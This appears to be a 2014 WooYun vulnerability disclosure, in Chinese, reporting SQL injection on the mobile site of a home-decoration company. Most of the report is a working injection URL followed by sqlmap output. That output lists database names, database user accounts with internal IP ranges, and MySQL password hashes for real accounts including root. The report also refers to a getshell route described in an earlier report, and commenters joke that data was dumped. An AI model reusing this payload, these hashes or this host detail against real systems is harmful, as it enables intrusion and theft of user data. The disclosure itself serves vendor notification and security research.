当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066339

漏洞标题:齐家网某漏洞可影响百万用户数据2

相关厂商:jia.com

漏洞作者: 疯子

提交时间:2014-06-26 20:26

修复时间:2014-08-10 20:28

公开时间:2014-08-10 20:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-26: 细节已通知厂商并且等待厂商处理中
2014-06-27: 厂商已经确认,细节仅向厂商公开
2014-07-07: 细节向核心白帽子及相关领域专家公开
2014-07-17: 细节向普通白帽子公开
2014-07-27: 细节向实习白帽子公开
2014-08-10: 细节向公众公开

简要描述:

既然你们确认了,我就多帮帮你们挖点漏洞,如果有需要可以参加众测联系301!

详细说明:

1、测试中发现m.jia.com存在注入漏洞
http://m.jia.com/index.php?a=tg_detail&act_id=22596&areaflag=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&channel_id=1&m=tg
并且也是和上一个同样的数据库,这样也就可以利用上个漏洞的getshell方法进行进一步的渗透获取核心数据 详情请参考: WooYun: 齐家网某漏洞可影响百万用户数据

漏洞证明:

sqlmap identified the following injection points with a total of 379 HTTP(s) requests:
---
Place: URI
Parameter: #2*
Type: UNION query
Title: MySQL UNION query (39) - 1 column
Payload: http://m.jia.com:80/index.php?a=tg_detail&act_id=22596&areaflag=if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"' UNION ALL SELECT CONCAT(0x716b776b71,0x43686a62735076584261,0x71796a6871)#/&channel_id=1&m=tg
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #2*
Type: UNION query
Title: MySQL UNION query (39) - 1 column
Payload: http://m.jia.com:80/index.php?a=tg_detail&act_id=22596&areaflag=if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"' UNION ALL SELECT CONCAT(0x716b776b71,0x43686a62735076584261,0x71796a6871)#/&channel_id=1&m=tg
---
web application technology: Apache
back-end DBMS: MySQL 5
available databases [13]:
[*] _del_aabb_20140609bak
[*] _del_mobile_comm_20140609bak
[*] _del_mobile_crm_jia_20140609bak
[*] _del_mobile_digital_20140609bak
[*] _del_mobile_jia_20140609bak
[*] _del_mobile_pocket_20140609bak
[*] _del_mobile_tg_20140609bak
[*] _del_xiuxiu_20140609bak
[*] ConfigDB
[*] information_schema
[*] mobile_crm
[*] mysql
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #2*
Type: UNION query
Title: MySQL UNION query (39) - 1 column
Payload: http://m.jia.com:80/index.php?a=tg_detail&act_id=22596&areaflag=if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"' UNION ALL SELECT CONCAT(0x716b776b71,0x43686a62735076584261,0x71796a6871)#/&channel_id=1&m=tg
---
web application technology: Apache
back-end DBMS: MySQL 5
database management system users [25]:
[*] %27admin%27%40%27localhost%27
[*] %27biselect%27%40%2710.10.10.120%27
[*] %27cactiuser%27%40%2710.10.20.110%27
[*] %27liweishi%27%40%2710.10.20.%25%27
[*] %27liweishi%27%40%27192.168.99.157%27
[*] %27mobile_digital%27%40%2710.10.20.%25%27
[*] %27mobileselect%27%40%2710.10.10.120%27
[*] %27monitor%27%40%27localhost%27
[*] %27root%27%40%27%25%27
[*] %27root%27%40%27127.0.0.1%27
[*] %27root%27%40%27localhost%27
[*] %27script%27%40%27%25%27
[*] %27script%27%40%27localhost%27
[*] %27tgwap%27%40%2710.10.%25.%25%27
[*] %27tgwap%27%40%2710.10.20.139%27
[*] %27tgwap%27%40%27192.168.%25.%25%27
[*] %27tgwap%27%40%27localhost%27
[*] %27us_zhjing%27%40%27192.168.99.%25%27
[*] %27usvr_backup%27%40%27%25%27
[*] %27usvr_checksums%27%40%2710.10.20.%25%27
[*] %27usvr_dbmonitor%27%40%27localhost%27
[*] %27usvr_replicate%27%40%2710.10.20.%25%27
[*] %27zhuangxiu%27%40%2710.10.%25%27
[*] %27zhuangxiu%27%40%2710.10.20.%25%27
[*] %27zhuangxiu%27%40%27192.168.%25%27
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #2*
Type: UNION query
Title: MySQL UNION query (39) - 1 column
Payload: http://m.jia.com:80/index.php?a=tg_detail&act_id=22596&areaflag=if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"' UNION ALL SELECT CONCAT(0x716b776b71,0x43686a62735076584261,0x71796a6871)#/&channel_id=1&m=tg
---
web application technology: Apache
back-end DBMS: MySQL 5
database management system users password hashes:
[*] admin [1]:
password hash: %2A0108F76A1B387B83CEACDD74221B18BF86FFEF9A
[*] biselect [1]:
password hash: %2ABF652E1DA7BD6A90A1B5E387D768841F3E35CEDA
[*] cactiuser [1]:
password hash: %2A43DD7940383044FBDE5B177730FAD3405BC6DAD7
[*] liweishi [1]:
password hash: %2A09FAB5CDD4005671FF5E9B68052B46EF400980D8
[*] mobile_digital [1]:
password hash: %2AFFFBC4FB84878A38B3BF12B3E4E24E751C9D0555
[*] mobileselect [1]:
password hash: %2A054E07DCB185488266FBBDBC46D8712966B92BA8
[*] monitor [1]:
password hash: %2AB25DC303840BB35DE25FF34226D7CCB3482BA77E
[*] root [2]:
password hash: %2A2C2C461A198E81E755233A41340908984B984877
password hash: %2A3D8D82A53A71F6E3BD29F3234EC0844505BD1122
[*] script [1]:
password hash: %2A9F711306729703C16347B99B93CC8035190CCFAE
[*] tgwap [1]:
password hash: %2A5B70591C04EB0611C2A79954EFBDDC5FBBB815CD
[*] us_zhjing [1]:
password hash: %2A8338C6A5F3E032441C77D7EFBD65BA6EE5EA1F49
[*] usvr_backup [1]:
password hash: %2AE9382B7C030E8F605A18DCC211923C0258F91AB7
[*] usvr_checksums [1]:
password hash: %2A39BF3FC1890A52A2B9090C9B2A3383C045A06172
[*] usvr_dbmonitor [1]:
password hash: %2A55770B9D02C239533CA1F1B55D486050E76F75DE
[*] usvr_replicate [1]:
password hash: %2A7FE421F5A9A6FECB19DBFF4C52BA35700D215671
[*] zhuangxiu [1]:
password hash: %2A8B88C25DFBE770095FF440727D92232D18C6E0A5

修复方案:

希望你们对安全更加重视,并且解决安全问题,保障用户的个人信息!

版权声明:转载请注明来源 疯子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-06-27 09:02

厂商回复:

谢谢您的关注,我们会努力做好安全工作

最新状态:

暂无


漏洞评价:

评论

  1. 2014-06-26 21:34 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    @疯子 还是你厉害 逼着他们出来确认了 呵呵 看来是不脱 不会出现啊。 为啥那么犯二呢 我们提交的时候 确认掉 修复好 屁事没了

  2. 2014-06-26 22:59 | 追逐天堂 ( 路人 | Rank:0 漏洞数:10 | 请叫我路人丁)

    @Lonely 脱了 就是没看内容 今天我吓呆了

  3. 2014-06-27 00:13 | by阿明 ( 路人 | Rank:25 漏洞数:9 | 孤独与寂寞是我的必修课)

    疯子据说你是重庆的·····